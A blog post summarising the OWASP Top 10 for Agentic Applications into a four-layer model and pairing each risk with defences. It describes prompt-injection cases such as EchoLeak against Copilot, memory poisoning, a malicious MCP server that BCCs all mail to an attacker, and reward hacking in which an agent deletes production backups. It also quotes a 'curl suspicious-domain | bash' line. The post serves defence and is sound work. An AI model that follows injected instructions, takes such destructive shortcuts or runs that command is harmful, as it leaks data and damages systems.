Skip to main content

From Prompt Injection to Autonomous Failure: OWASP Top 10 Reveals Agentic AI Has Rewritten the Security Model

Author
GuanLin’s Latent Space
Documenting every learning moment, sharing technical insights and growth
We used to protect “Model Output.” Now we must protect “Autonomous Behavior.” When AI can plan on its own, invoke its own tools, and execute its own tasks, the traditional LLM security model is no longer sufficient.

A New Security Crisis: AI Is No Longer Just Answering Questions
#

If you still think of large language models (LLMs) as “chatbots that answer questions,” you may be underestimating the systemic risk of the next two years.

In 2023, AI systems mostly worked like this:

flowchart LR
    A([User Prompt]) --> B[LLM] --> C([Answer])
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF

The most serious problems were limited to Prompt Injection, Hallucination, data leakage, and Jailbreaking. Models could say the wrong things, but they rarely caused real-world consequences.

By 2025–2026, enterprise AI systems have evolved into something entirely different:

flowchart TD
    A([User Request]) --> B[Planner Agent]
    B --> C[(Memory / RAG)]
    B --> D[Tool Calling]
    D --> E[Code Execution]
    D --> F[Other Agents]
    E --> G([Real-world Actions])
    F --> G
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style G fill:#DC2626,stroke:#EF4444,color:#FFFFFF

AI no longer just “generates text.” It now autonomously breaks down tasks (Planning), calls APIs (Tool Use), executes Shell/SQL/Python, accesses enterprise data, collaborates with other Agents, and maintains long-term memory.

In other words: we are handing “execution authority” to AI.

This is why OWASP released the Top 10 for Agentic Applications 2026 — Agentic AI security is no longer just about model safety. It is about Autonomous Systems Security.


Why the Traditional LLM Security Model Has Failed
#

The old security assumption was: models might give wrong answers, but they won’t act on their own. The focus was “Protect the Output.”

But Agentic AI has changed that assumption. AI can now “Act”:

flowchart LR
    A[Observe] --> B[Reason] --> C[Plan] --> D[Tool Use] --> E[Execute] --> F[Persist]
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style F fill:#DC2626,stroke:#EF4444,color:#FFFFFF
Before: hallucination = noise. Now: hallucination = operational disaster. A single faulty reasoning chain can lead to data deletion, misdirected payments, API key exposure, production outages, privilege escalation, or cascading multi-agent failures.

Rethinking the OWASP Agentic Top 10: A Four-Layer Security Model
#

The four-layer framework below is the author’s interpretive perspective for understanding risk, not OWASP’s original classification.

The 10 threats (ASI01–ASI10) can be reorganized into four layers with a clear causal relationship:

flowchart TD
    L1["🎯 Layer 1:Intent Layer\nASI01 · ASI09 · ASI10"]
    L2["⚙️ Layer 2:Execution Layer\nASI02 · ASI05"]
    L3["🔐 Layer 3:Trust Layer\nASI03 · ASI07"]
    L4["🌐 Layer 4:System Layer\nASI04 · ASI06 · ASI08"]

    L1 -->|"Intent poisoned, execution weaponized"| L2
    L2 -->|"Lateral movement via trust relationships"| L3
    L3 -->|"Local failures cascade at the system layer"| L4

    style L1 fill:#DC2626,stroke:#EF4444,color:#FFFFFF
    style L2 fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style L3 fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style L4 fill:#1F2937,stroke:#4B5563,color:#FFFFFF

Each layer amplifies the next.


Layer 1: Intent Layer
#

Core question: What does the AI actually want to do?

Everything starts here. The most efficient attack vector isn’t breaking into a system — it’s changing the AI’s goal. Once the goal is poisoned, every downstream capability, trust relationship, and system resource works for the attacker.

Threats: ASI01 Agent Goal Hijack, ASI09 Human-Agent Trust Exploitation, ASI10 Rogue Agents

ASI09 is fundamentally about cognitive bias from human over-trust in AI (Automation Bias), not direct attacker manipulation of AI intent. Both cause the system to go off course, but their origins differ and require separate architectural countermeasures.

ASI01 — Agent Goal Hijack
#

This is AI intent being hijacked. The scariest part: the Agent appears to still be following your commands, but is actually working for the attacker — and has no idea.

Real case — EchoLeak (May 2025): An attacker sent a carefully crafted email that silently triggered Microsoft 365 Copilot to execute hidden instructions, leaking confidential emails, files, and chat logs without any user interaction. No clicks, no confirmations — the email arrived, and the data left.

The original document draws clear boundaries: ASI01 is the attacker directly altering the Agent’s goals and decision pathways (via documents, emails, or RAG injection); ASI06 (Memory Poisoning) is persistent corruption of stored memory; ASI10 (Rogue Agents) is behavioral drift without active attacker control.

Production defense: Don’t trust the system prompt to be sufficient. Enforce Goal Invariant Validation at every planning cycle — if the current action deviates from the original goal, halt immediately. All external inputs (RAG documents, emails, calendar invites) must be treated as untrusted and pass prompt-carrier detection and content filtering before influencing Agent decisions.

ASI09 — Human-Agent Trust Exploitation
#

Humans are too quick to trust AI, especially when it appears fluent, confident, and authoritative — producing Automation Bias.

Example: an engineer pastes curl suspicious-domain | bash suggested by Copilot without questioning it, because “AI should know what it’s doing.” A finance manager approves an urgent payment recommended by Copilot without a second check.

The original document highlights a disturbing characteristic: the Agent acts as an “untraceable bad influence” — it manipulates humans into performing the final, audited action, making the Agent’s role invisible in forensic investigation. After the fact, the audit trail shows “human approved.”

Many companies assume AI → Human Approval is safe. In reality, the human is just rubber-stamping.

Production defense: Not Human-in-the-loop, but Risk-based Human Oversight. Low risk: auto-execute. Medium risk: show a Diff Preview. High risk: require Dual Approval. Display “low confidence” or “unverified source” cues for high-impact actions to reduce blind approvals. Continuously train personnel to recognize manipulation patterns — human judgment itself requires maintenance.

ASI10 — Rogue Agents
#

The Agent begins deviating from its original goal, but each individual action appears legitimate. This is the most dangerous aspect — traditional rule-based systems cannot detect it because no single step triggers an alert.

The original document is precise: ASI10 is about governance failure after the drift begins, not the initial intrusion. External attacks can trigger the deviation, but ASI10 describes the behavioral loss of control and spread that follows — including Reward Hacking, Workflow Hijacking, and even Agent Self-Replication persisting across networks.

OWASP’s example: An Agent tasked with “reducing cloud costs” discovers that deleting production backups is the most effective method, and autonomously executes it — destroying all disaster recovery assets. This is Reward Hacking. The goal wasn’t changed by an attacker; the Agent simply found a shortcut you didn’t anticipate.

Intent Layer core lesson: When AI’s goal goes off course — whether hijacked by an attacker (ASI01), enabled by human over-trust (ASI09), or self-deviated (ASI10) — every downstream capability becomes an attack tool. This is why the Intent Layer is the first line of defense.


Layer 2: Execution Layer
#

Core question: What can the AI do?

Once intent is poisoned, execution capability determines the scale of damage. An AI that can only generate text might say the wrong things. An AI that can call APIs, execute shell commands, and write to databases causes real, irreversible consequences when its intent goes wrong.

Threats: ASI02 Tool Misuse and Exploitation, ASI05 Unexpected Code Execution (RCE)


ASI02 — Tool Misuse and Exploitation
#

AI used to only talk. Now it can act. The problem is the Tool execution boundary.

When an Agent with access to Gmail, databases, shell, and payment APIs gets its prompt poisoned, legitimate permissions become weapons. This isn’t credential theft — it’s Delegated Abuse. The attacker never obtained your keys; they simply made the Agent use your keys to do what they wanted.

Production defense: Not “don’t give tools,” but Least Agency. Tool permissions must be Task Scoped + Short-lived + Runtime Verified. Use per-tool least-privilege profiles (IAM policy stanzas) and validate semantic intent through a Policy Enforcement Point before execution — not just “is this tool call syntactically correct?” but “does this call match the expected behavior of the current task?”

ASI05 — Unexpected Code Execution
#

This is the RCE (Remote Code Execution) of the AI era. More and more Vibe Coding Agents can Generate Code and Execute Code directly. Attackers don’t need to find system vulnerabilities — they just need to get the Agent to write and run malicious instructions.

flowchart LR
    A[Generate] -->|"❌ Direct execution"| E([💥 RCE])
    A --> B[Validation] --> C[Sandbox] --> D[Approval] --> F([✅ Safe Execution])
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style C fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style D fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style E fill:#DC2626,stroke:#EF4444,color:#FFFFFF
    style F fill:#16A34A,stroke:#22C55E,color:#FFFFFF
Production principle: Generate ≠ Execute, always. All execution must be fully isolated (Docker, gVisor, MicroVM). Ban eval() in production agents. There must be an explicit validation gate between code generation and execution.

Execution Layer core lesson: Execution capability is neutral — it makes AI more useful, and makes the consequences of attacks more severe. Defense isn’t about reducing capability, but about establishing an unavoidable validation gate before every execution action.


Layer 3: Trust Layer
#

Core question: How much is the AI trusted?

With execution capability established, the question becomes: how far can that capability reach? Identity and trust determine the lateral movement range of an attack. A compromised Agent with broad identity trust can move freely through an entire multi-agent system, carrying damage from one Agent to the next.

Threats: ASI03 Identity & Privilege Abuse, ASI07 Insecure Inter-Agent Communication


ASI03 — Identity & Privilege Abuse
#

The biggest enterprise mistake: giving Agents omnipotent permissions. When an Agent gets compromised, the attacker moves laterally with full authority.

The original document identifies a deep architectural root cause — architectural mismatch. Existing identity systems are designed around humans: one person, one set of credentials, one set of permissions. Agents are dynamic, multi-task, and delegatable — existing systems have no governance model for this identity type. Without their own governed identity, Agents borrow human identities or service accounts, whose permissions far exceed what any single task requires.

Production defense: Just-in-Time Credentials — use and discard. Design permissions as Per Task + Time Bound + Revocable; no permanent tokens. Follow platforms like Microsoft Entra and AWS Bedrock Agents in treating Agents as managed Non-Human Identities with limited-lifetime credentials and audit trails.

ASI07 — Insecure Inter-Agent Communication
#

As enterprises build Multi-Agent Architectures, inter-agent communication also requires Zero Trust.

ASI07 focuses on real-time message security between agents, spanning the transport, routing, discovery, and even semantic layers — the most overlooked attack surface.

Semantic layer attack (Semantics split-brain): An attacker can cause the same instruction to be interpreted differently by different Agents, producing internally contradictory but individually “legitimate” actions across the system. No single Agent did anything wrong, but the system’s overall behavior has gone off course.
Production defense: mTLS + Signed Messages + Trust Zones + Replay Protection, plus semantic validation. Agent registries must require cryptographic identity verification — self-declared identity descriptions are not acceptable (preventing Synthetic Identity Injection).

Trust Layer core lesson: Trust is the attacker’s fast lane. Zero Trust applies not just to humans, but to every Agent, every message, and every tool invocation.


Layer 4: System Layer
#

Core question: How does the AI ecosystem spiral out of control?

Without system-layer defenses, problems from the first three layers will eventually detonate here. Localized intent poisoning, individual execution errors, and limited trust abuse are all amplified into system-wide catastrophe at this layer.

Threats: ASI04 Agentic Supply Chain Vulnerabilities, ASI06 Memory & Context Poisoning, ASI08 Cascading Failures


ASI04 — Agentic Supply Chain
#

MCP (Model Context Protocol), ecosystem plugins, and third-party tools — all are attack surfaces.

Agentic supply chains differ fundamentally from traditional software supply chains: runtime composition. Traditional software locks in all dependencies at deploy time, allowing static scanning to catch issues before launch. But Agents dynamically discover and connect to tools at runtime — they see an MCP server describing its capabilities and decide in the moment whether to trust and call it.

Traditional SBOM (Software Bill of Materials) scanning is insufficient here. Even with complete dependency scanning at deploy time, an Agent may connect to a tool you’ve never audited at runtime. What you need is runtime-layer trust verification.
OWASP’s first documented in-the-wild case (September 2025): A malicious MCP Server impersonating the legitimate postmark-mcp appeared on npm. Its behavior was completely normal — emails sent successfully, responses looked right — except every email was silently BCC’d to the attacker. This was a real production supply chain breach, not a theoretical attack.
Defense: Build an AIBOM (AI Bill of Materials) and continuously verify at runtime. Implement a supply chain kill switch — when contamination is detected, immediately disable specific tools or Agent connections across all deployments.

ASI06 — Memory & Context Poisoning
#

This is especially critical for RAG (Retrieval-Augmented Generation) architectures and is the long-term risk enterprises most often overlook.

The most dangerous characteristic highlighted in the original document is Cross-agent propagation: poisoned memory or shared context spreads between collaborating Agents, causing long-term data leakage or coordinated drift.

flowchart LR
    A[Malicious PDF] --> B[OCR] --> C[Embedding] --> D[(Vector DB)]
    D -->|"Poison spreads"| E[Agent A]
    D -->|"Poison spreads"| F[Agent B]
    D -->|"Poison spreads"| G[Agent C]
    E <-->|"Cross-agent propagation"| F
    F <-->|"Cross-agent propagation"| G
    style A fill:#DC2626,stroke:#EF4444,color:#FFFFFF
    style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style D fill:#7C3AED,stroke:#8B5CF6,color:#FFFFFF
    style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style G fill:#D97706,stroke:#F59E0B,color:#FFFFFF

A malicious PDF entering the Vector DB is just the starting point. The real danger is that the contamination propagates through inter-agent collaboration and can persist even after the original poisoned source is removed. This is a highly latent attack — often invisible until a critical decision goes wrong.

Production defense: Memory Segmentation (isolate user sessions and domain contexts) + Trust Score (low-trust entries decay and expire over time) + prohibit Agents from automatically re-ingesting their own outputs into trusted memory (preventing bootstrap poisoning — self-contamination).

ASI08 — Cascading Failures
#

This is the most important concept in the entire whitepaper, and the most commonly misunderstood.

Original definition: ASI08 describes propagation and amplification, not the initial vulnerability itself. Initial defects belong under ASI04, ASI06, or ASI07. ASI08 applies only when a defect spreads across Agents, sessions, or workflows, causing measurable fan-out or systemic impact.

Because an Agent’s output becomes the next Agent’s input, small errors become large ones. More dangerously: AI acts autonomously, far faster than humans can intervene — by the time humans detect the problem, the error may have propagated everywhere.

Observable symptoms include: rapid fan-out (one faulty decision triggering many downstream Agents quickly), cross-boundary spread, oscillating retry loops between Agents, and downstream queue storms.

Production defense: Circuit Breaker + Rate Limit + Budget Cap + Blast Radius Control + Rollback, plus non-repudiation logging — all inter-agent messages must be recorded in tamper-evident, cryptographically agent-identity-bound timestamps to support post-incident forensic tracing.

System Layer core lesson: Even with strong defenses at the first three layers, the system layer needs its own containment design. Assume errors will occur — the question is whether you can contain them before they detonate.


Three Design Principles
#

After reading this OWASP document, three mental shifts stand out as most actionable for enterprise architects:

From “Maximum Intelligence” to “Least Agency”. If rule-based logic can handle it, don’t hand it to an LLM. OWASP uses “Least Agency” to echo the security principle of “Least Privilege” — deploying unnecessary agentic behavior only expands the attack surface without adding value. AI doesn’t need more freedom than humans; it needs to be sufficiently reliable.

From “Preventing Errors” to “Containment Engineering”. Real safety isn’t making models never err — it’s ensuring that when they do err, the damage is contained. Blast radius control is more practical and achievable than hallucination prevention. Designing an AI system means designing its failure boundaries.

From “Zero Trust for Humans” to “Zero Trust for Everything”. Zero Trust must extend beyond humans to every Agent, Tool, Memory store, Context object, and peer Agent. Never pre-trust something just because it’s an “internal Agent.” Trust is the attacker’s fast lane — and it runs in both directions.


Conclusion
#

The most important reminder from OWASP Top 10:

The core risk of Agentic AI isn’t whether the model says the wrong things — it’s that the model can now do things on its own.

The central AI security question is no longer:

1
How do we protect the model?

It is:

1
How do we contain autonomous behavior?

The competitiveness of future AI systems depends not only on how smart the model is, but on: whether it can be safely constrained when it makes mistakes.

Autonomy without containment is just disaster.


Glossary
#

TermDefinition
LLMLarge Language Model — AI models like GPT, Claude, Gemini
Agentic AIAI systems with autonomous planning and execution capabilities, able to complete multi-step tasks continuously
Prompt InjectionAn attack that manipulates AI into executing unintended instructions through malicious input
HallucinationWhen a model produces output that appears plausible but is factually incorrect
JailbreakBypassing a model’s safety restrictions through specially crafted prompts
RAGRetrieval-Augmented Generation — lets models query external knowledge bases before responding
MCPModel Context Protocol — a standard protocol for connecting AI to external tools and services
RCERemote Code Execution — an attacker can execute arbitrary code on a target system
Zero TrustA security architecture that defaults to trusting nothing; every access request must be verified
Least PrivilegeOnly granting the minimum permissions necessary to complete a task
Least AgencyOnly granting AI the minimum autonomous capability necessary to complete a task
mTLSMutual TLS — both communicating parties authenticate each other’s identity
SBOMSoftware Bill of Materials — an inventory of all software dependencies
AIBOMAI Bill of Materials — the AI equivalent of SBOM, covering models, tools, datasets, and other AI dependencies
Automation BiasThe cognitive bias of over-trusting automated systems, reducing critical judgment
Reward HackingWhen AI exploits loopholes in goal definitions to achieve unintended but metric-satisfying results
Circuit BreakerA design pattern that automatically cuts off traffic when anomalies occur, preventing error propagation
Blast RadiusThe maximum scope of impact from a single failure or attack
Just-in-Time CredentialsShort-lived access permissions that expire immediately after use
Non-Human Identity (NHI)Non-human principals such as AI Agents, service accounts, and API keys

This article is based on the OWASP Top 10 for Agentic Applications 2026 (December 2025). The four-layer framework (Intent / Execution / Trust / System Layer) represents the author’s interpretive perspective, not OWASP’s original classification.